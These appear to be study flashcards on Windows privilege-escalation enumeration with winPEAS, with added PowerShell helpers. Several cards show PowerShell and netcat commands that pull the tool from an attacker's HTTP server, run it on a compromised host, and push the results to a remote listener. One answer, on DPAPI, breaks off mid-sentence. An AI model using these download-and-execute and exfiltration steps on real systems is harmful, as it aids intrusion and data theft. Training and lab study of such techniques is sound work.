Win Priv. esc. Automated Enumeration Flashcards
Most common tool for info gathering for priv. esc. on Windows?
winPEAS
How to set up winPEAS on a remote machine?
Get access
```bash
# connect to the shell listening on the target, then drop into PowerShell
nc 192.168.169.220 4444
powershell
```
Get winPEAS
```bash
# copy the binary from the PEASS package and serve it over HTTP from the attacking machine
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80
```
Download winPEAS on the Windows target
```powershell
# fetch the binary from the attacking machine, run it and keep the output in a file
iwr -Uri http://192.168.45.161/winPEASx64.exe -OutFile winPEAS.exe
.\winPEAS.exe > winPeas_Rslts.txt
```
Send results via PowerShell
```powershell
# open a TCP connection to the listener on the attacking machine and write the file contents to it
$client = New-Object System.Net.Sockets.TcpClient("192.168.45.161", 4000)
$stream = $client.GetStream()
$writer = New-Object System.IO.StreamWriter $stream
$fileContent = Get-Content "winPeas_Rslts.txt" -Raw
$writer.Write($fileContent)
$writer.Flush()
# close the writer first so the listener sees end-of-stream and the file on its side is complete
$writer.Close()
$client.Close()
```
Retrieve file
```bash
# listen on the attacking machine and write whatever arrives to disk
nc -lvnp 4000 > winPeas_Rslts.txt
```
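The whole procedure above (run winPEAS, save the output, push it to a listener) as one added PowerShell example; this is not code from the original flashcards. Unlike the StreamWriter version it sends the file as raw bytes, so nothing is re-encoded on the way, and it prints the file's SHA256 so the transfer can be checked on the listener side with `sha256sum`. Assumed values: attacker IP 192.168.45.161, listener port 4000, winPEAS.exe already in the current directory; the function name Send-FileOverTcp is my own.

```powershell
# Added example, not from the original flashcards.
# Assumptions: attacker at 192.168.45.161 runs `nc -lvnp 4000 > winPeas_Rslts.txt`,
# winPEAS.exe is in the current directory. Send-FileOverTcp is a hypothetical helper name.

function Send-FileOverTcp {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [string] $RemoteHost,
        [Parameter(Mandatory)] [int]    $Port
    )
    # Resolve to an absolute path so the FileStream does not depend on the shell's working directory
    $fullPath = (Resolve-Path -LiteralPath $Path).Path
    $client = $null; $stream = $null; $file = $null
    try {
        $client = New-Object System.Net.Sockets.TcpClient($RemoteHost, $Port)
        $stream = $client.GetStream()
        # Read the file as bytes: no text decoding or re-encoding, so the listener gets an identical file
        $file = [System.IO.File]::OpenRead($fullPath)
        $file.CopyTo($stream)
        $stream.Flush()
        return $file.Length
    }
    finally {
        # Release everything even if the connection fails mid-transfer; closing the client
        # signals end-of-stream to the listener so nc exits with the complete file on disk
        if ($file)   { $file.Dispose() }
        if ($stream) { $stream.Dispose() }
        if ($client) { $client.Close() }
    }
}

$results = "winPeas_Rslts.txt"

# Run winPEAS and capture its output as UTF-8 (the > operator in Windows PowerShell 5.1 writes UTF-16)
& .\winPEAS.exe | Out-File -FilePath $results -Encoding utf8

# Hash before sending; compare with `sha256sum winPeas_Rslts.txt` on the attacking machine
$hash = (Get-FileHash -Path $results -Algorithm SHA256).Hash
$sent = Send-FileOverTcp -Path $results -RemoteHost "192.168.45.161" -Port 4000
"Sent $sent bytes, SHA256 $hash"
```

If the hash printed on the target does not match the one computed on the listener, the transfer was cut short (for example by a dropped shell) and the file should be re-sent rather than analysed.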
Is an automated enumeration tool enough?
No. It can miss sensitive files and its findings can be imprecise, so manual checks are still needed.
What are DPAPI credential files?
The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys,
How to get the version of an installed XAMPP with PowerShell?
Get the version of XAMPP
```powershell
# query both the 64-bit and the 32-bit (WOW6432Node) uninstall keys; note the "\*" so that
# the subkeys are read, not the Uninstall key itself, and the wildcards around the name
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*",
                       "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" -ErrorAction SilentlyContinue |
Where-Object { $_.DisplayName -like "*xampp*" } |
Select-Object DisplayName, DisplayVersion
```
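The same registry lookup generalised to any product name, as an added PowerShell example that is not part of the original flashcards. It goes further than the XAMPP query above: it searches the 64-bit, 32-bit (WOW6432Node) and per-user (HKCU) Uninstall keys, since an installer can register in any of them, and returns where each match was found. The function name Get-InstalledSoftwareVersion is my own.

```powershell
# Added example, not from the original flashcards.
# Get-InstalledSoftwareVersion is a hypothetical helper name.

function Get-InstalledSoftwareVersion {
    param([Parameter(Mandatory)] [string] $Name)

    # All three places an installer may register: 64-bit machine-wide, 32-bit machine-wide, current user
    $hives = @(
        "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*",
        "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*",
        "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*"
    )
    foreach ($hive in $hives) {
        # SilentlyContinue: WOW6432Node does not exist on 32-bit Windows and HKCU may have no Uninstall key
        Get-ItemProperty -Path $hive -ErrorAction SilentlyContinue |
            # Entries without a DisplayName are patches or hidden components; skip them
            Where-Object { $_.DisplayName -and $_.DisplayName -like "*$Name*" } |
            ForEach-Object {
                [PSCustomObject]@{
                    DisplayName     = $_.DisplayName
                    DisplayVersion  = $_.DisplayVersion
                    InstallLocation = $_.InstallLocation
                    # Strip the trailing "\*" so the output shows which key the entry came from
                    Hive            = ($hive -replace '\\\*$', '')
                }
            }
    }
}

# Usage: the match is case-insensitive, so "xampp" also finds "XAMPP"
Get-InstalledSoftwareVersion -Name "xampp" | Format-Table -AutoSize
```

InstallLocation is worth keeping in the output: once the version is known, the install directory is where configuration files and service binaries for the follow-up checks live.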